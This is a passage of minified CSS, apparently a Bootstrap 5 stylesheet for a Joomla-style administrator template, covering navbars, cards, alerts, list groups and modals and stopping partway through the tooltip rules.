.input-group{width:auto}.btn-group>.btn-group:not(:first-child),.btn-group>.btn:not(:first-child){margin-left:-1px}.btn-group>.btn-group:not(:last-child)>.btn,.btn-group>.btn:not(:last-child):not(.dropdown-toggle){border-top-right-radius:0;border-bottom-right-radius:0}.btn-group>.btn-group:not(:first-child)>.btn,.btn-group>.btn:nth-child(n+3),.btn-group>:not(.btn-check)+.btn{border-top-left-radius:0;border-bottom-left-radius:0}.dropdown-toggle-split{padding-right:.75rem;padding-left:.75rem}.dropdown-toggle-split:after,.dropend .dropdown-toggle-split:after,.dropup .dropdown-toggle-split:after{margin-left:0}.dropstart .dropdown-toggle-split:before{margin-right:0}.btn-group-sm>.btn+.dropdown-toggle-split,.btn-sm+.dropdown-toggle-split{padding-right:.375rem;padding-left:.375rem}.btn-group-lg>.btn+.dropdown-toggle-split,.btn-lg+.dropdown-toggle-split{padding-right:.75rem;padding-left:.75rem}.btn-group-vertical{flex-direction:column;align-items:flex-start;justify-content:center}.btn-group-vertical>.btn,.btn-group-vertical>.btn-group{width:100%}.btn-group-vertical>.btn-group:not(:first-child),.btn-group-vertical>.btn:not(:first-child){margin-top:-1px}.btn-group-vertical>.btn-group:not(:last-child)>.btn,.btn-group-vertical>.btn:not(:last-child):not(.dropdown-toggle){border-bottom-right-radius:0;border-bottom-left-radius:0}.btn-group-vertical>.btn-group:not(:first-child)>.btn,.btn-group-vertical>.btn~.btn{border-top-left-radius:0;border-top-right-radius:0}.nav{display:flex;flex-wrap:wrap;padding-left:0;margin-bottom:0;list-style:none}.nav-link{display:block;padding:.5rem 1rem;color:var(--template-link-color);transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out}@media (prefers-reduced-motion:reduce){.nav-link{transition:none}}.nav-link:focus,.nav-link:hover{color:var(--template-link-hover-color)}.nav-link.disabled{color:#666e76;pointer-events:none;cursor:default}.nav-tabs{border-bottom:1px solid #dee2e6}.nav-tabs .nav-link{margin-bottom:-1px;background:none;border:1px solid transparent;border-top-left-radius:.25rem;border-top-right-radius:.25rem}.nav-tabs .nav-link:focus,.nav-tabs .nav-link:hover{border-color:#e8e8e8 #e8e8e8 #dee2e6;isolation:isolate}.nav-tabs .nav-link.disabled{color:#666e76;background-color:transparent;border-color:transparent}.nav-tabs .nav-item.show .nav-link,.nav-tabs .nav-link.active{color:#495057;background-color:#fff;border-color:#dee2e6 #dee2e6 #fff}.nav-tabs .dropdown-menu{margin-top:-1px;border-top-left-radius:0;border-top-right-radius:0}.nav-pills .nav-link{background:none;border:0;border-radius:.25rem}.nav-pills .nav-link.active,.nav-pills .show>.nav-link{color:#fff;background-color:#2a69b7}.nav-fill .nav-item,.nav-fill>.nav-link{flex:1 1 auto;text-align:center}.nav-justified .nav-item,.nav-justified>.nav-link{flex-basis:0;flex-grow:1;text-align:center}.nav-fill .nav-item .nav-link,.nav-justified .nav-item .nav-link{width:100%}.tab-content>.tab-pane{display:none}.tab-content>.active{display:block}.navbar{position:relative;display:flex;flex-wrap:wrap;align-items:center;justify-content:space-between;padding-top:.5rem;padding-bottom:.5rem}.navbar>.container,.navbar>.container-fluid,.navbar>.container-lg,.navbar>.container-md,.navbar>.container-sm,.navbar>.container-xl,.navbar>.container-xxl{display:flex;flex-wrap:inherit;align-items:center;justify-content:space-between}.navbar-brand{padding-top:.3125rem;padding-bottom:.3125rem;margin-right:1rem;font-size:1.25rem;white-space:nowrap}.navbar-nav{display:flex;flex-direction:column;padding-left:0;margin-bottom:0;list-style:none}.navbar-nav .nav-link{padding-right:0;padding-left:0}.navbar-nav .dropdown-menu{position:static}.navbar-text{padding-top:.5rem;padding-bottom:.5rem}.navbar-collapse{flex-basis:100%;flex-grow:1;align-items:center}.navbar-toggler{padding:.25rem .75rem;font-size:1.25rem;line-height:1;background-color:transparent;border:1px solid transparent;border-radius:.25rem;transition:box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.navbar-toggler{transition:none}}.navbar-toggler:hover{text-decoration:none}.navbar-toggler:focus{text-decoration:none;outline:0;box-shadow:0 0 0 .25rem}.navbar-toggler-icon{display:inline-block;width:1.5em;height:1.5em;vertical-align:middle;background-repeat:no-repeat;background-position:50%;background-size:100%}.navbar-nav-scroll{max-height:var(--scroll-height,75vh);overflow-y:auto}@media (min-width:576px){.navbar-expand-sm{flex-wrap:nowrap;justify-content:flex-start}.navbar-expand-sm .navbar-nav{flex-direction:row}.navbar-expand-sm .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-sm .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand-sm .navbar-nav-scroll{overflow:visible}.navbar-expand-sm .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-sm .navbar-toggler{display:none}}@media (min-width:768px){.navbar-expand-md{flex-wrap:nowrap;justify-content:flex-start}.navbar-expand-md .navbar-nav{flex-direction:row}.navbar-expand-md .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-md .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand-md .navbar-nav-scroll{overflow:visible}.navbar-expand-md .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-md .navbar-toggler{display:none}}@media (min-width:992px){.navbar-expand-lg{flex-wrap:nowrap;justify-content:flex-start}.navbar-expand-lg .navbar-nav{flex-direction:row}.navbar-expand-lg .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-lg .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand-lg .navbar-nav-scroll{overflow:visible}.navbar-expand-lg .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-lg .navbar-toggler{display:none}}@media (min-width:1200px){.navbar-expand-xl{flex-wrap:nowrap;justify-content:flex-start}.navbar-expand-xl .navbar-nav{flex-direction:row}.navbar-expand-xl .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-xl .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand-xl .navbar-nav-scroll{overflow:visible}.navbar-expand-xl .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-xl .navbar-toggler{display:none}}@media (min-width:1400px){.navbar-expand-xxl{flex-wrap:nowrap;justify-content:flex-start}.navbar-expand-xxl .navbar-nav{flex-direction:row}.navbar-expand-xxl .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-xxl .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand-xxl .navbar-nav-scroll{overflow:visible}.navbar-expand-xxl .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-xxl .navbar-toggler{display:none}}.navbar-expand{flex-wrap:nowrap;justify-content:flex-start}.navbar-expand .navbar-nav{flex-direction:row}.navbar-expand .navbar-nav .dropdown-menu{position:absolute}.navbar-expand .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand .navbar-nav-scroll{overflow:visible}.navbar-expand .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand .navbar-toggler{display:none}.navbar-light .navbar-brand,.navbar-light .navbar-brand:focus,.navbar-light .navbar-brand:hover{color:rgba(0,0,0,.9)}.navbar-light .navbar-nav .nav-link{color:rgba(0,0,0,.55)}.navbar-light .navbar-nav .nav-link:focus,.navbar-light .navbar-nav .nav-link:hover{color:rgba(0,0,0,.7)}.navbar-light .navbar-nav .nav-link.disabled{color:rgba(0,0,0,.3)}.navbar-light .navbar-nav .nav-link.active,.navbar-light .navbar-nav .show>.nav-link{color:rgba(0,0,0,.9)}.navbar-light .navbar-toggler{color:rgba(0,0,0,.55);border-color:rgba(0,0,0,.1)}.navbar-light .navbar-toggler-icon{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 30 30'%3E%3Cpath stroke='rgba(0, 0, 0, 0.55)' stroke-linecap='round' stroke-miterlimit='10' stroke-width='2' d='M4 7h22M4 15h22M4 23h22'/%3E%3C/svg%3E")}.navbar-light .navbar-text{color:rgba(0,0,0,.55)}.navbar-light .navbar-text a,.navbar-light .navbar-text a:focus,.navbar-light .navbar-text a:hover{color:rgba(0,0,0,.9)}.navbar-dark .navbar-brand,.navbar-dark .navbar-brand:focus,.navbar-dark .navbar-brand:hover{color:#fff}.navbar-dark .navbar-nav .nav-link{color:hsla(0,0%,100%,.55)}.navbar-dark .navbar-nav .nav-link:focus,.navbar-dark .navbar-nav .nav-link:hover{color:hsla(0,0%,100%,.75)}.navbar-dark .navbar-nav .nav-link.disabled{color:hsla(0,0%,100%,.25)}.navbar-dark .navbar-nav .nav-link.active,.navbar-dark .navbar-nav .show>.nav-link{color:#fff}.navbar-dark .navbar-toggler{color:hsla(0,0%,100%,.55);border-color:hsla(0,0%,100%,.1)}.navbar-dark .navbar-toggler-icon{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 30 30'%3E%3Cpath stroke='rgba(255, 255, 255, 0.55)' stroke-linecap='round' stroke-miterlimit='10' stroke-width='2' d='M4 7h22M4 15h22M4 23h22'/%3E%3C/svg%3E")}.navbar-dark .navbar-text{color:hsla(0,0%,100%,.55)}.navbar-dark .navbar-text a,.navbar-dark .navbar-text a:focus,.navbar-dark .navbar-text a:hover{color:#fff}.card{position:relative;display:flex;flex-direction:column;min-width:0;word-wrap:break-word;background-color:#fff;background-clip:border-box;border:0 solid transparent;border-radius:.25rem}.card>hr{margin-right:0;margin-left:0}.card>.list-group{border-top:inherit;border-bottom:inherit}.card>.list-group:first-child{border-top-width:0;border-top-left-radius:.25rem;border-top-right-radius:.25rem}.card>.list-group:last-child{border-bottom-width:0;border-bottom-right-radius:.25rem;border-bottom-left-radius:.25rem}.card>.card-header+.list-group,.card>.list-group+.card-footer{border-top:0}.card-body{flex:1 1 auto;padding:1rem}.card-title{margin-bottom:.5rem}.card-subtitle{margin-top:-.25rem}.card-subtitle,.card-text:last-child{margin-bottom:0}.card-link:hover{text-decoration:none}.card-link+.card-link{margin-left:1rem}.card-header{padding:.5rem 1rem;margin-bottom:0;background-color:rgba(0,0,0,.03);border-bottom:0 solid transparent}.card-header:first-child{border-radius:.25rem .25rem 0 0}.card-footer{padding:.5rem 1rem;background-color:rgba(0,0,0,.03);border-top:0 solid transparent}.card-footer:last-child{border-radius:0 0 .25rem .25rem}.card-header-tabs{margin-bottom:-.5rem;border-bottom:0}.card-header-pills,.card-header-tabs{margin-right:-.5rem;margin-left:-.5rem}.card-img-overlay{position:absolute;top:0;right:0;bottom:0;left:0;padding:1rem;border-radius:.25rem}.card-img,.card-img-bottom,.card-img-top{width:100%}.card-img,.card-img-top{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.card-img,.card-img-bottom{border-bottom-right-radius:.25rem;border-bottom-left-radius:.25rem}.card-group>.card{margin-bottom:1rem}@media (min-width:576px){.card-group{display:flex;flex-flow:row wrap}.card-group>.card{flex:1 0 0%;margin-bottom:0}.card-group>.card+.card{margin-left:0;border-left:0}.card-group>.card:not(:last-child){border-top-right-radius:0;border-bottom-right-radius:0}.card-group>.card:not(:last-child) .card-header,.card-group>.card:not(:last-child) .card-img-top{border-top-right-radius:0}.card-group>.card:not(:last-child) .card-footer,.card-group>.card:not(:last-child) .card-img-bottom{border-bottom-right-radius:0}.card-group>.card:not(:first-child){border-top-left-radius:0;border-bottom-left-radius:0}.card-group>.card:not(:first-child) .card-header,.card-group>.card:not(:first-child) .card-img-top{border-top-left-radius:0}.card-group>.card:not(:first-child) .card-footer,.card-group>.card:not(:first-child) .card-img-bottom{border-bottom-left-radius:0}}.breadcrumb{display:flex;flex-wrap:wrap;padding:0;margin-bottom:1rem;list-style:none;background-color:var(--white)}.breadcrumb-item+.breadcrumb-item{padding-left:.5rem}.breadcrumb-item+.breadcrumb-item:before{float:left;padding-right:.5rem;color:#666e76;content:var(--breadcrumb-divider,"/")}.breadcrumb-item.active{color:#666e76}.pagination{display:flex;padding-left:0;list-style:none}.page-link{position:relative;display:block;color:var(--template-link-color);background-color:#fff;border:1px solid #dee2e6;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.page-link{transition:none}}.page-link:hover{z-index:2;border-color:#dee2e6}.page-link:focus,.page-link:hover{color:var(--template-link-hover-color);background-color:#e8e8e8}.page-link:focus{z-index:3;outline:0;box-shadow:0 0 0 .25rem rgba(42,105,183,.25)}.page-item:not(:first-child) .page-link{margin-left:-1px}.page-item.active .page-link{z-index:3;color:#fff;background-color:#2a69b7;border-color:#2a69b7}.page-item.disabled .page-link{color:#666e76;pointer-events:none;background-color:#fff;border-color:#dee2e6}.page-link{padding:.375rem .75rem}.page-item:first-child .page-link{border-top-left-radius:.25rem;border-bottom-left-radius:.25rem}.page-item:last-child .page-link{border-top-right-radius:.25rem;border-bottom-right-radius:.25rem}.pagination-lg .page-link{padding:.75rem 1.5rem;font-size:1.25rem}.pagination-lg .page-item:first-child .page-link{border-top-left-radius:.3rem;border-bottom-left-radius:.3rem}.pagination-lg .page-item:last-child .page-link{border-top-right-radius:.3rem;border-bottom-right-radius:.3rem}.pagination-sm .page-link{padding:.25rem .5rem;font-size:.8rem}.pagination-sm .page-item:first-child .page-link{border-top-left-radius:.2rem;border-bottom-left-radius:.2rem}.pagination-sm .page-item:last-child .page-link{border-top-right-radius:.2rem;border-bottom-right-radius:.2rem}.badge{display:inline-block;padding:.3rem .2rem;font-size:.75rem;font-weight:700;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:baseline;border-radius:.2rem}.badge:empty{display:none}.btn .badge{position:relative;top:-1px}.alert{position:relative;padding:1rem;margin-bottom:1rem;border:1px solid transparent;border-radius:.25rem}.alert-heading{color:inherit}.alert-link{font-weight:700}.alert-dismissible{padding-right:3rem}.alert-dismissible .btn-close{position:absolute;top:0;right:0;z-index:2;padding:1.25rem 1rem}.alert-primary{color:#0b1c32;background-color:#d0d5dd;border-color:#b8c1cb}.alert-primary .alert-link{color:#091628}.alert-secondary{color:#2c3034;background-color:#dbdcdd;border-color:#c8cbcd}.alert-secondary .alert-link{color:#23262a}.alert-success{color:#294b32;background-color:#dae5dd;border-color:#c7d8cc}.alert-success .alert-link{color:#213c28}.alert-info{color:#193f6e;background-color:#d4e1f1;border-color:#bfd2ea}.alert-info .alert-link{color:#143258}.alert-warning{color:#664808;background-color:#fff0d0;border-color:#ffe9b9}.alert-warning .alert-link{color:#523a06}.alert-danger{color:#761817;background-color:#f3d4d4;border-color:#eebfbe}.alert-danger .alert-link{color:#5e1312}.alert-light{color:#636464;background-color:#fefefe;border-color:#fdfdfe}.alert-light .alert-link{color:#4f5050}.alert-dark{color:#141619;background-color:#d3d3d4;border-color:#bcbebf}.alert-dark .alert-link{color:#101214}.alert-atum-link-color{color:#193f6e;background-color:#d4e1f1;border-color:#bfd2ea}.alert-atum-link-color .alert-link{color:#143258}.alert-atum-text-dark{color:#2c3034;background-color:#dbdcdd;border-color:#c8cbcd}.alert-atum-text-dark .alert-link{color:#23262a}.alert-action{color:#0b1c32;background-color:#d0d5dd;border-color:#b8c1cb}.alert-action .alert-link{color:#091628}.alert-error{color:#230807;background-color:#d8cfce;border-color:#c4b6b6}.alert-error .alert-link{color:#1c0606}.alert-alert-success{color:#091c14;background-color:#cfd5d3;border-color:#b7c1bc}.alert-alert-success .alert-link{color:#071610}@-webkit-keyframes progress-bar-stripes{0%{background-position-x:1rem}}@keyframes progress-bar-stripes{0%{background-position-x:1rem}}.progress{height:1rem;font-size:.75rem;background-color:#e8e8e8;border-radius:.25rem}.progress,.progress-bar{display:flex;overflow:hidden}.progress-bar{flex-direction:column;justify-content:center;color:#fff;text-align:center;white-space:nowrap;background-color:#2a69b7;transition:width .6s ease}@media (prefers-reduced-motion:reduce){.progress-bar{transition:none}}.progress-bar-striped{background-image:linear-gradient(45deg,hsla(0,0%,100%,.15) 25%,transparent 0,transparent 50%,hsla(0,0%,100%,.15) 0,hsla(0,0%,100%,.15) 75%,transparent 0,transparent);background-size:1rem 1rem}.progress-bar-animated{-webkit-animation:progress-bar-stripes 1s linear infinite;animation:progress-bar-stripes 1s linear infinite}@media (prefers-reduced-motion:reduce){.progress-bar-animated{-webkit-animation:none;animation:none}}.list-group{display:flex;flex-direction:column;padding-left:0;margin-bottom:0;border-radius:.25rem}.list-group-numbered{list-style-type:none;counter-reset:section}.list-group-numbered>li:before{content:counters(section,".") ". ";counter-increment:section}.list-group-item-action{width:100%;color:#495057;text-align:inherit}.list-group-item-action:focus,.list-group-item-action:hover{z-index:1;color:#495057;text-decoration:none;background-color:#f8f9fa}.list-group-item-action:active{color:var(--template-text-dark);background-color:#e8e8e8}.list-group-item{position:relative;display:block;padding:.75rem 1rem;color:#212529;border:1px solid hsl(var(--hue),40%,85%)}.list-group-item:first-child{border-top-left-radius:inherit;border-top-right-radius:inherit}.list-group-item:last-child{border-bottom-right-radius:inherit;border-bottom-left-radius:inherit}.list-group-item.disabled,.list-group-item:disabled{color:#666e76;pointer-events:none;background-color:var(--white-offset)}.list-group-item.active{z-index:2;color:#fff;background-color:#2a69b7;border-color:#2a69b7}.list-group-item+.list-group-item{border-top-width:0}.list-group-item+.list-group-item.active{margin-top:-1px;border-top-width:1px}.list-group-horizontal{flex-direction:row}.list-group-horizontal>.list-group-item:first-child{border-bottom-left-radius:.25rem;border-top-right-radius:0}.list-group-horizontal>.list-group-item:last-child{border-top-right-radius:.25rem;border-bottom-left-radius:0}.list-group-horizontal>.list-group-item.active{margin-top:0}.list-group-horizontal>.list-group-item+.list-group-item{border-top-width:1px;border-left-width:0}.list-group-horizontal>.list-group-item+.list-group-item.active{margin-left:-1px;border-left-width:1px}@media (min-width:576px){.list-group-horizontal-sm{flex-direction:row}.list-group-horizontal-sm>.list-group-item:first-child{border-bottom-left-radius:.25rem;border-top-right-radius:0}.list-group-horizontal-sm>.list-group-item:last-child{border-top-right-radius:.25rem;border-bottom-left-radius:0}.list-group-horizontal-sm>.list-group-item.active{margin-top:0}.list-group-horizontal-sm>.list-group-item+.list-group-item{border-top-width:1px;border-left-width:0}.list-group-horizontal-sm>.list-group-item+.list-group-item.active{margin-left:-1px;border-left-width:1px}}@media (min-width:768px){.list-group-horizontal-md{flex-direction:row}.list-group-horizontal-md>.list-group-item:first-child{border-bottom-left-radius:.25rem;border-top-right-radius:0}.list-group-horizontal-md>.list-group-item:last-child{border-top-right-radius:.25rem;border-bottom-left-radius:0}.list-group-horizontal-md>.list-group-item.active{margin-top:0}.list-group-horizontal-md>.list-group-item+.list-group-item{border-top-width:1px;border-left-width:0}.list-group-horizontal-md>.list-group-item+.list-group-item.active{margin-left:-1px;border-left-width:1px}}@media (min-width:992px){.list-group-horizontal-lg{flex-direction:row}.list-group-horizontal-lg>.list-group-item:first-child{border-bottom-left-radius:.25rem;border-top-right-radius:0}.list-group-horizontal-lg>.list-group-item:last-child{border-top-right-radius:.25rem;border-bottom-left-radius:0}.list-group-horizontal-lg>.list-group-item.active{margin-top:0}.list-group-horizontal-lg>.list-group-item+.list-group-item{border-top-width:1px;border-left-width:0}.list-group-horizontal-lg>.list-group-item+.list-group-item.active{margin-left:-1px;border-left-width:1px}}@media (min-width:1200px){.list-group-horizontal-xl{flex-direction:row}.list-group-horizontal-xl>.list-group-item:first-child{border-bottom-left-radius:.25rem;border-top-right-radius:0}.list-group-horizontal-xl>.list-group-item:last-child{border-top-right-radius:.25rem;border-bottom-left-radius:0}.list-group-horizontal-xl>.list-group-item.active{margin-top:0}.list-group-horizontal-xl>.list-group-item+.list-group-item{border-top-width:1px;border-left-width:0}.list-group-horizontal-xl>.list-group-item+.list-group-item.active{margin-left:-1px;border-left-width:1px}}@media (min-width:1400px){.list-group-horizontal-xxl{flex-direction:row}.list-group-horizontal-xxl>.list-group-item:first-child{border-bottom-left-radius:.25rem;border-top-right-radius:0}.list-group-horizontal-xxl>.list-group-item:last-child{border-top-right-radius:.25rem;border-bottom-left-radius:0}.list-group-horizontal-xxl>.list-group-item.active{margin-top:0}.list-group-horizontal-xxl>.list-group-item+.list-group-item{border-top-width:1px;border-left-width:0}.list-group-horizontal-xxl>.list-group-item+.list-group-item.active{margin-left:-1px;border-left-width:1px}}.list-group-flush{border-radius:0}.list-group-flush>.list-group-item{border-width:0 0 1px}.list-group-flush>.list-group-item:last-child{border-bottom-width:0}.list-group-item-primary{color:#0b1c32;background-color:#d0d5dd}.list-group-item-primary.list-group-item-action:focus,.list-group-item-primary.list-group-item-action:hover{color:#0b1c32;background-color:#bbc0c7}.list-group-item-primary.list-group-item-action.active{color:#fff;background-color:#0b1c32;border-color:#0b1c32}.list-group-item-secondary{color:#2c3034;background-color:#dbdcdd}.list-group-item-secondary.list-group-item-action:focus,.list-group-item-secondary.list-group-item-action:hover{color:#2c3034;background-color:#c5c6c7}.list-group-item-secondary.list-group-item-action.active{color:#fff;background-color:#2c3034;border-color:#2c3034}.list-group-item-success{color:#294b32;background-color:#dae5dd}.list-group-item-success.list-group-item-action:focus,.list-group-item-success.list-group-item-action:hover{color:#294b32;background-color:#c4cec7}.list-group-item-success.list-group-item-action.active{color:#fff;background-color:#294b32;border-color:#294b32}.list-group-item-info{color:#193f6e;background-color:#d4e1f1}.list-group-item-info.list-group-item-action:focus,.list-group-item-info.list-group-item-action:hover{color:#193f6e;background-color:#bfcbd9}.list-group-item-info.list-group-item-action.active{color:#fff;background-color:#193f6e;border-color:#193f6e}.list-group-item-warning{color:#664808;background-color:#fff0d0}.list-group-item-warning.list-group-item-action:focus,.list-group-item-warning.list-group-item-action:hover{color:#664808;background-color:#e6d8bb}.list-group-item-warning.list-group-item-action.active{color:#fff;background-color:#664808;border-color:#664808}.list-group-item-danger{color:#761817;background-color:#f3d4d4}.list-group-item-danger.list-group-item-action:focus,.list-group-item-danger.list-group-item-action:hover{color:#761817;background-color:#dbbfbf}.list-group-item-danger.list-group-item-action.active{color:#fff;background-color:#761817;border-color:#761817}.list-group-item-light{color:#636464;background-color:#fefefe}.list-group-item-light.list-group-item-action:focus,.list-group-item-light.list-group-item-action:hover{color:#636464;background-color:#e5e5e5}.list-group-item-light.list-group-item-action.active{color:#fff;background-color:#636464;border-color:#636464}.list-group-item-dark{color:#141619;background-color:#d3d3d4}.list-group-item-dark.list-group-item-action:focus,.list-group-item-dark.list-group-item-action:hover{color:#141619;background-color:#bebebf}.list-group-item-dark.list-group-item-action.active{color:#fff;background-color:#141619;border-color:#141619}.list-group-item-atum-link-color{color:#193f6e;background-color:#d4e1f1}.list-group-item-atum-link-color.list-group-item-action:focus,.list-group-item-atum-link-color.list-group-item-action:hover{color:#193f6e;background-color:#bfcbd9}.list-group-item-atum-link-color.list-group-item-action.active{color:#fff;background-color:#193f6e;border-color:#193f6e}.list-group-item-atum-text-dark{color:#2c3034;background-color:#dbdcdd}.list-group-item-atum-text-dark.list-group-item-action:focus,.list-group-item-atum-text-dark.list-group-item-action:hover{color:#2c3034;background-color:#c5c6c7}.list-group-item-atum-text-dark.list-group-item-action.active{color:#fff;background-color:#2c3034;border-color:#2c3034}.list-group-item-action{color:#0b1c32;background-color:#d0d5dd}.list-group-item-action.list-group-item-action:focus,.list-group-item-action.list-group-item-action:hover{color:#0b1c32;background-color:#bbc0c7}.list-group-item-action.list-group-item-action.active{color:#fff;background-color:#0b1c32;border-color:#0b1c32}.list-group-item-error{color:#230807;background-color:#d8cfce}.list-group-item-error.list-group-item-action:focus,.list-group-item-error.list-group-item-action:hover{color:#230807;background-color:#c2bab9}.list-group-item-error.list-group-item-action.active{color:#fff;background-color:#230807;border-color:#230807}.list-group-item-alert-success{color:#091c14;background-color:#cfd5d3}.list-group-item-alert-success.list-group-item-action:focus,.list-group-item-alert-success.list-group-item-action:hover{color:#091c14;background-color:#bac0be}.list-group-item-alert-success.list-group-item-action.active{color:#fff;background-color:#091c14;border-color:#091c14}.btn-close{box-sizing:content-box;width:1em;height:1em;padding:.25em;color:#000;background:transparent url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16'%3E%3Cpath d='M.293.293a1 1 0 011.414 0L8 6.586 14.293.293a1 1 0 111.414 1.414L9.414 8l6.293 6.293a1 1 0 01-1.414 1.414L8 9.414l-6.293 6.293a1 1 0 01-1.414-1.414L6.586 8 .293 1.707a1 1 0 010-1.414z'/%3E%3C/svg%3E") 50%/1em auto no-repeat;border:0;border-radius:.25rem;opacity:.5}.btn-close:hover{color:#000;text-decoration:none;opacity:.75}.btn-close:focus{outline:0;box-shadow:0 0 0 .25rem rgba(42,105,183,.25);opacity:1}.btn-close.disabled,.btn-close:disabled{pointer-events:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;opacity:.25}.btn-close-white{-webkit-filter:invert(1) grayscale(100%) brightness(200%);filter:invert(1) grayscale(100%) brightness(200%)}.modal{position:fixed;top:0;left:0;z-index:1050;display:none;width:100%;height:100%;overflow-x:hidden;overflow-y:auto;outline:0}.modal-dialog{position:relative;width:auto;margin:.5rem;pointer-events:none}.modal.fade .modal-dialog{transition:-webkit-transform .3s ease-out;transition:transform .3s ease-out;transition:transform .3s ease-out,-webkit-transform .3s ease-out;-webkit-transform:translateY(-50px);transform:translateY(-50px)}@media (prefers-reduced-motion:reduce){.modal.fade .modal-dialog{transition:none}}.modal.show .modal-dialog{-webkit-transform:none;transform:none}.modal.modal-static .modal-dialog{-webkit-transform:scale(1.02);transform:scale(1.02)}.modal-dialog-scrollable{height:calc(100% - 1rem)}.modal-dialog-scrollable .modal-content{max-height:100%;overflow:hidden}.modal-dialog-scrollable .modal-body{overflow-y:auto}.modal-dialog-centered{display:flex;align-items:center;min-height:calc(100% - 1rem)}.modal-content{position:relative;display:flex;flex-direction:column;width:100%;pointer-events:auto;background-color:#fff;background-clip:padding-box;border:1px solid rgba(0,0,0,.2);border-radius:.3rem;outline:0}.modal-backdrop{position:fixed;top:0;left:0;z-index:1040;width:100vw;height:100vh;background-color:#000}.modal-backdrop.fade{opacity:0}.modal-backdrop.show{opacity:.5}.modal-header{display:flex;flex-shrink:0;align-items:center;justify-content:space-between;padding:1rem;border-bottom:1px solid #dee2e6;border-top-left-radius:calc(.3rem - 1px);border-top-right-radius:calc(.3rem - 1px)}.modal-header .btn-close{padding:.5rem;margin:-.5rem -.5rem -.5rem auto}.modal-title{margin-bottom:0;line-height:1.5}.modal-body{position:relative;flex:1 1 auto;padding:1rem}.modal-footer{display:flex;flex-wrap:wrap;flex-shrink:0;align-items:center;justify-content:flex-end;padding:.75rem;border-top:1px solid #dee2e6;border-bottom-right-radius:calc(.3rem - 1px);border-bottom-left-radius:calc(.3rem - 1px)}.modal-footer>*{margin:.25rem}@media (min-width:576px){.modal-dialog{max-width:500px;margin:1.75rem auto}.modal-dialog-scrollable{height:calc(100% - 3.5rem)}.modal-dialog-centered{min-height:calc(100% - 3.5rem)}.modal-sm{max-width:300px}}@media (min-width:992px){.modal-lg,.modal-xl{max-width:800px}}@media (min-width:1200px){.modal-xl{max-width:1140px}}.modal-fullscreen{width:100vw;max-width:none;height:100%;margin:0}.modal-fullscreen .modal-content{height:100%;border:0;border-radius:0}.modal-fullscreen .modal-header{border-radius:0}.modal-fullscreen .modal-body{overflow-y:auto}.modal-fullscreen .modal-footer{border-radius:0}@media (max-width:575.98px){.modal-fullscreen-sm-down{width:100vw;max-width:none;height:100%;margin:0}.modal-fullscreen-sm-down .modal-content{height:100%;border:0;border-radius:0}.modal-fullscreen-sm-down .modal-header{border-radius:0}.modal-fullscreen-sm-down .modal-body{overflow-y:auto}.modal-fullscreen-sm-down .modal-footer{border-radius:0}}@media (max-width:767.98px){.modal-fullscreen-md-down{width:100vw;max-width:none;height:100%;margin:0}.modal-fullscreen-md-down .modal-content{height:100%;border:0;border-radius:0}.modal-fullscreen-md-down .modal-header{border-radius:0}.modal-fullscreen-md-down .modal-body{overflow-y:auto}.modal-fullscreen-md-down .modal-footer{border-radius:0}}@media (max-width:991.98px){.modal-fullscreen-lg-down{width:100vw;max-width:none;height:100%;margin:0}.modal-fullscreen-lg-down .modal-content{height:100%;border:0;border-radius:0}.modal-fullscreen-lg-down .modal-header{border-radius:0}.modal-fullscreen-lg-down .modal-body{overflow-y:auto}.modal-fullscreen-lg-down .modal-footer{border-radius:0}}@media (max-width:1199.98px){.modal-fullscreen-xl-down{width:100vw;max-width:none;height:100%;margin:0}.modal-fullscreen-xl-down .modal-content{height:100%;border:0;border-radius:0}.modal-fullscreen-xl-down .modal-header{border-radius:0}.modal-fullscreen-xl-down .modal-body{overflow-y:auto}.modal-fullscreen-xl-down .modal-footer{border-radius:0}}@media (max-width:1399.98px){.modal-fullscreen-xxl-down{width:100vw;max-width:none;height:100%;margin:0}.modal-fullscreen-xxl-down .modal-content{height:100%;border:0;border-radius:0}.modal-fullscreen-xxl-down .modal-header{border-radius:0}.modal-fullscreen-xxl-down .modal-body{overflow-y:auto}.modal-fullscreen-xxl-down .modal-footer{border-radius:0}}.tooltip{position:absolute;z-index:1070;display:block;margin:0;font-family:var(--font-sans-serif);font-style:normal;font-weight:400;line-height:1.5;text-align:left;text-align:start;text-decoration:none;text-shadow:none;text-transform:none;letter-spacing:normal;word-break:normal;word-spacing:normal;white-space:normal;line-break:auto;font-size:.8rem;word-wrap:break-word;opacity:0}.tooltip.show{opacity:.9}.tooltip .tooltip-arrow{position:absolute;display:block;width:.8rem;height:.4rem}.tooltip .tooltip-arrow:before{position:absolute;content:"";border-color:transparent;border-style:solid}.bs-tooltip-auto[data-popper-placement^=top],.bs-tooltip-top{padding:.4rem 0}.bs-tooltip-auto[data-popper-placement^=top] .tooltip-arrow,.bs-tooltip-top 